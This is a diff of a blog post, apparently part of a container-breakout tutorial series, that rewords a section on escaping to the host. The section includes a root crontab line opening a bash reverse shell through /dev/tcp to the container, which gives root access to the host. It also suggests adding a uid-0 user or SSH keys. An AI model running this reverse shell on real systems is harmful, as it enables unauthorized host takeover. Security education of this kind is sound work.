NodyHub/blog/content/posts/container-breakouts-part1.md

 [arch ~]#
 ```

-We have assumed that there is an SSH daemon running on the host, the service is not hardened and the `sudo` package was installed.
-Well, you could exchange the sudo-step by creating another user with `uid=0(root)` to get rid of that step, but anyway.
+For this scenario, the SSH daemon is running on the host, the configuration is not hardened and the `sudo` package is installed.
+The sudo step can be exchanged by creating another user with `uid=0(root)`.
+Another option would be the creation of SSH keys for existing users.

 ### Cronjob

-Due to the fact that in a default setup the container is direct connected to the host, we can initiate not only connections from the container to the host, also vice-versa.
+Due to the fact that in a default setup the container is **direct connected to the host**, we can initiate not only connections from the container to the host, also vice-versa.
 To do so, we need the IP address from the container.
-Depending on the binaries that are available on the host, we initiate a reverse shell by a cronjob that connects to an exposed port on the container.
+Depending on the binaries that are available on the host, we initiate a **reverse shell by** a **cronjob** that connects to an exposed port on the container.
 In this showcase, we use `bash` for the reverse connection and `netcat` to handle the connection in the container.
 The following line is all we need:

 ```
 * * * * * root bash -i >& /dev/tcp/$CONTAINER_IP/$CONTAINER_PORT 0>&1
 ```

-The cronjob is executed every minute as user `root` on the host.
-So, as soon as the cronjob gets trigger, we are getting root access to the host system.
+The **cronjob** is executed **every minute** as user `root` on the host.
+So, as soon as the cronjob gets trigger, we are getting **root access to** the **host** system.

 Here are all steps that must be performed (we start in the container).